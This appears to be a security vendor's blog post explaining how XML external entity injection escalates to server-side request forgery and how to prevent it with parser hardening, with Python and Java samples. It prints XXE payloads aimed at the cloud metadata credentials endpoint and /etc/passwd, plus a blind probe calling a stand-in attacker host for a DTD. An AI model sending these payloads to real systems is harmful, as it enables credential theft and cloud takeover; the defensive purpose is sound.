XXE to SSRF via DOCTYPE: exploiting and preventing XML external entity attacks

XML external entity injection does not stop at file reads. Here is how the XXE-to-SSRF chain works through DOCTYPE and how to prevent it.

XML external entity (XXE) injection does not always end at a file read. When the XML parser has outbound network access, the external entity reference can point at a URL the attacker chooses, turning a document-parsing bug into server-side request forgery (SSRF). That is the XXE-to-SSRF chain, and it has outlived every obituary written for XML processing.

This post walks the mechanics of the chain through the DOCTYPE declaration, shows how it escalates into the cloud, and lays out the parser configuration that closes it for good.

How XXE works through DOCTYPE

XXE abuses a legitimate XML feature: the document type declaration (DOCTYPE) can carry a DTD that declares external entities, which the parser dereferences when it expands the document. A vulnerable parser resolves an attacker-declared entity at parse time.

<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<invoice><note>&xxe;</note></invoice>

When the parser expands &xxe;, it issues an HTTP GET from inside the target’s network. The classic file-read variant points the entity at file:///etc/passwd; the SSRF variant points it at an internal URL. XXE is tracked as CWE-611 (Improper Restriction of XML External Entity Reference) and is documented in depth in the OWASP XXE Prevention Cheat Sheet.
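To see the mechanism without touching a network, the sketch below uses Python’s low-level xml.parsers.expat binding and installs an ExternalEntityRefHandler that records each SYSTEM identifier instead of fetching it. The helper name entity_fetch_targets is hypothetical; a vulnerable parser would open the recorded URL at exactly the point where this handler returns.

```python
import xml.parsers.expat

PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE invoice [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<invoice><note>&xxe;</note></invoice>"""


def entity_fetch_targets(document: str) -> list[str]:
    """Return the SYSTEM identifiers an entity-resolving parser would dereference."""
    targets: list[str] = []
    parser = xml.parsers.expat.ParserCreate()

    def on_external_entity(context, base, system_id, public_id):
        # A vulnerable parser would open system_id here; this sketch only records it.
        targets.append(system_id)
        return 1  # non-zero tells expat the reference was handled

    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(document, True)
    return targets


print(entity_fetch_targets(PAYLOAD))
```

Recording rather than fetching keeps the example safe to run anywhere while still showing that the entity reference, not anything in the response, is what triggers the request.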

Why XML processing is still in scope

Teams assume XML is a solved, legacy concern, and that assumption is exactly why the bug persists. XML still arrives through:

  • SOAP and WSDL endpoints behind “modern” REST facades
  • Office document formats (.docx, .xlsx) that are zipped XML
  • SVG uploads, SAML assertions, and RSS/Atom ingestion
  • Configuration and invoice import features

Any one of these can reach an under-configured parser.
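Because Office formats are ZIP archives of XML parts, a DOCTYPE can arrive in an upload that never looks like XML at the HTTP layer. As a rough triage aid, not a defence (parser hardening is still the fix), the hypothetical helper xml_parts_with_doctype below lists the XML parts of a ZIP container that declare a DOCTYPE.

```python
import io
import zipfile


def xml_parts_with_doctype(archive_bytes: bytes) -> list[str]:
    """Return the names of XML parts in a ZIP container that declare a DOCTYPE.

    Sketch only: a plain byte search, so a part encoded as UTF-16 (or any
    other non-ASCII-compatible encoding) would slip past it.
    """
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            # .docx/.xlsx keep their XML in *.xml parts and *.rels relationship files
            if not name.endswith((".xml", ".rels")):
                continue
            if b"<!DOCTYPE" in archive.read(name):
                flagged.append(name)
    return flagged


# Usage: build a tiny in-memory "document" with one tainted part.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
    archive.writestr(
        "word/document.xml",
        '<?xml version="1.0"?><!DOCTYPE d [<!ENTITY x SYSTEM "http://127.0.0.1/">]><d>&x;</d>',
    )
print(xml_parts_with_doctype(buffer.getvalue()))  # ['word/document.xml']
```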

The escalation: from entity to cloud takeover

Once the XXE is confirmed, the chain extends the usual way. The most damaging pivot targets the cloud instance metadata service:

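  1. XXE confirmed: the parser dereferences the external entity.
  2. SSRF reaches metadata: the entity points at the link-local metadata endpoint (169.254.169.254). On AWS this works where IMDSv1 is still enabled; IMDSv2 requires a session token obtained with a PUT request, which a plain entity fetch cannot issue.
  3. Credentials exfiltrated: instance-role credentials are returned in the parsed response or over an out-of-band channel.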

That is the same shape as the →CloudMeta path in Pentrova’s escalation catalog, and it converts a medium-looking parsing bug into instance-role takeover.
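Step 2 hinges on where the entity points. The sketch below is a hypothetical triage helper, classify_entity_target, that buckets a SYSTEM identifier by address range using Python’s ipaddress module. It deliberately does not resolve hostnames or normalise alternative IP encodings (decimal or hex forms, for example), so treat it as a first pass for reading findings, not as an egress control.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_entity_target(system_id: str) -> str:
    """Bucket an external entity's SYSTEM identifier by what it would reach.

    Hostnames are not resolved and alternative IP encodings are not
    normalised, so anything that is not a literal IP reports "hostname".
    """
    parts = urlsplit(system_id)
    if parts.scheme == "file":
        return "local-file"
    host = parts.hostname
    if host is None:
        return "unknown"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    # Order matters: 169.254.0.0/16 and 127.0.0.0/8 are also flagged is_private.
    if addr.is_link_local:
        return "link-local"  # includes the 169.254.169.254 metadata endpoint
    if addr.is_loopback:
        return "loopback"
    if addr.is_private:
        return "private"
    return "public"


for url in (
    "http://169.254.169.254/latest/meta-data/",
    "file:///etc/passwd",
    "http://10.0.0.5/admin",
):
    print(url, "->", classify_entity_target(url))
```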

How Pentrova detects it deterministically

Pentrova’s XXE module treats every XML-accepting endpoint as a candidate injection point. The agent supplies a payload that declares an external entity pointing at an internal canary URL, sends the document, and watches a dedicated out-of-band callback channel. A parser that dereferences the entity triggers a fetch from inside the target’s network, and that callback is the signal. Reporting on a callback rather than a reflected string is what keeps the finding deterministic; the same out-of-band discipline drives our Log4Shell detection.

The full sequence lives in the catalog as a multi-step chain, reproduced safely under sandbox guardrails at every step, so the report shows not just “is it vulnerable” but “what an attacker can reach from here”.
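The callback-based confirmation described above can be sketched end to end on one machine. This is not Pentrova’s implementation: a loopback HTTP server stands in for the out-of-band channel, misconfigured_parse simulates a vulnerable target by fetching every external entity, and all names (CallbackRecorder, build_probe, callback_received) are hypothetical. The per-probe token is what makes the result deterministic, since a hit on that exact path can only come from that probe.

```python
import http.server
import threading
import urllib.request
import uuid
import xml.parsers.expat


class CallbackRecorder(http.server.BaseHTTPRequestHandler):
    """Stand-in for an out-of-band callback channel: records every request path."""

    hits: list[str] = []

    def do_GET(self):
        CallbackRecorder.hits.append(self.path)  # record before replying
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # silence the default stderr access log


def start_callback_server() -> http.server.HTTPServer:
    # Port 0 asks the OS for any free port on loopback.
    server = http.server.HTTPServer(("127.0.0.1", 0), CallbackRecorder)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def build_probe(callback_base: str) -> tuple[str, str]:
    # A fresh token per probe ties any callback to exactly one request.
    token = uuid.uuid4().hex
    document = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE probe [\n"
        f'  <!ENTITY xxe SYSTEM "{callback_base}/{token}">\n'
        "]>\n"
        "<probe>&xxe;</probe>"
    )
    return token, document


def misconfigured_parse(document: str) -> None:
    """Simulated vulnerable target: dereferences every external entity."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # bypass proxies
    parser = xml.parsers.expat.ParserCreate()

    def fetch(context, base, system_id, public_id):
        with opener.open(system_id, timeout=5) as response:
            response.read()
        return 1

    parser.ExternalEntityRefHandler = fetch
    parser.Parse(document, True)


def callback_received(token: str) -> bool:
    return any(path == "/" + token for path in CallbackRecorder.hits)


if __name__ == "__main__":
    server = start_callback_server()
    base = f"http://127.0.0.1:{server.server_address[1]}"
    token, probe = build_probe(base)
    misconfigured_parse(probe)
    print("confirmed:", callback_received(token))
    server.shutdown()
    server.server_close()
```

Note that the verdict comes from the callback server, never from anything the target echoes back, which is the property the detection relies on.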

How to prevent XXE

The fix is almost always a few lines of parser configuration: disable DTD and external entity processing. Concrete examples:

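// Java: harden DocumentBuilderFactory (setFeature throws ParserConfigurationException)
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Strongest single setting: reject any DOCTYPE (Xerces feature)
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defence in depth: no external general/parameter entities, no external DTD loading
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
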
# Python: use defusedxml instead of the stdlib parser
from defusedxml.ElementTree import parse
# Entity declarations and external references are refused by default;
# forbid_dtd=True additionally rejects any DOCTYPE
tree = parse("invoice.xml", forbid_dtd=True)

The principle generalises: disallow the DOCTYPE declaration where you can, disable external general and parameter entities everywhere, and deny outbound network egress from parsing workloads as defence in depth.
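Where defusedxml is not an option, the same policy can be approximated with the standard library alone. The sketch below is hypothetical (parse_untrusted and UnsafeXMLError are illustrative names, not a library API): it pre-screens the document with expat handlers that refuse any DOCTYPE by default, or, with allow_dtd=True, refuse only an external DTD subset and external general or parameter entity declarations. It then hands the document to xml.etree.ElementTree, which does not fetch external entities. Internal entities are still expanded in the allow_dtd=True mode, so entity-expansion limits remain a separate concern.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when an untrusted document uses a DTD feature we refuse."""


def parse_untrusted(document: str, allow_dtd: bool = False) -> ET.Element:
    """Pre-screen with expat, then parse with ElementTree."""
    screen = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXMLError("DOCTYPE declarations are not allowed")
        if system_id or public_id:
            raise UnsafeXMLError("an external DTD subset is not allowed")

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # External general and parameter entities both carry a system identifier.
        if system_id or public_id:
            raise UnsafeXMLError(f"external entity {name!r} is not allowed")

    screen.StartDoctypeDeclHandler = on_doctype
    screen.EntityDeclHandler = on_entity_decl
    screen.Parse(document, True)  # exceptions raised in handlers propagate from Parse
    return ET.fromstring(document)


print(parse_untrusted("<invoice><note>ok</note></invoice>").find("note").text)  # ok
```

The two modes mirror the advice above: reject the DOCTYPE where you can, and where a DTD is genuinely needed, keep it but refuse anything external.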

Key takeaways

  • XXE abuses the DOCTYPE declaration to make a parser dereference an attacker-chosen entity.
  • With outbound access, that entity fetch becomes SSRF, and reaching cloud metadata becomes credential theft.
  • XML is still everywhere (SOAP, Office files, SVG, SAML), so the bug remains live.
  • The fix is to disable DTD and external-entity processing in the parser; deny egress as a backstop.

FAQ

What is the difference between XXE and SSRF? XXE is the injection point: an XML parser dereferencing an attacker-declared entity. SSRF is the impact when that entity points at a URL, making the server issue a request on the attacker’s behalf. XXE-to-SSRF is the chain that connects them.

Can XXE be exploited without seeing the response (blind XXE)? Yes. Blind XXE uses out-of-band techniques, typically an external DTD that forces the parser to send data to an attacker-controlled server. Pentrova confirms exactly this case by watching an out-of-band callback channel rather than relying on a reflected response.
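Blind XXE typically starts with a request for the attacker’s DTD, before any entity content could reach a response. The sketch below (the helper dtd_fetch_attempts and the host attacker.example are hypothetical) records the fetches expat would attempt for an external DTD subset under two parameter-entity settings, without performing them.

```python
import xml.parsers.expat

BLIND_PROBE = '<!DOCTYPE data SYSTEM "http://attacker.example/evil.dtd"><data/>'


def dtd_fetch_attempts(document: str, param_entity_parsing: int) -> list[str]:
    """Record external DTD / parameter-entity fetches without performing them."""
    attempts: list[str] = []
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(param_entity_parsing)

    def on_external(context, base, system_id, public_id):
        attempts.append(system_id)
        return 1  # report "handled" without reading anything

    parser.ExternalEntityRefHandler = on_external
    parser.Parse(document, True)
    return attempts


# External DTD loading enabled: the DTD is requested before <data/> is parsed.
print(dtd_fetch_attempts(BLIND_PROBE, xml.parsers.expat.XML_PARAM_ENTITY_PARSING_ALWAYS))
# ['http://attacker.example/evil.dtd']
# Expat's default: the external subset is never requested.
print(dtd_fetch_attempts(BLIND_PROBE, xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER))
# []
```

The document body here is empty, so nothing could ever be reflected; the only evidence of the vulnerable setting is the outbound request itself.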

Does disabling DTDs break legitimate XML? Rarely. Most applications parse data documents that have no legitimate need for external entities. Disabling the DOCTYPE declaration is the safest default; where a DTD is genuinely required, disable only external entity resolution.

See how the chain runs end to end in API Pentesting, or start a free engagement.

Written by

Pentrova Research

Pentrova Research writes about deterministic offensive-security proof, LLM-driven pentest chains, and how to ship exploit-grade evidence into engineering pipelines.
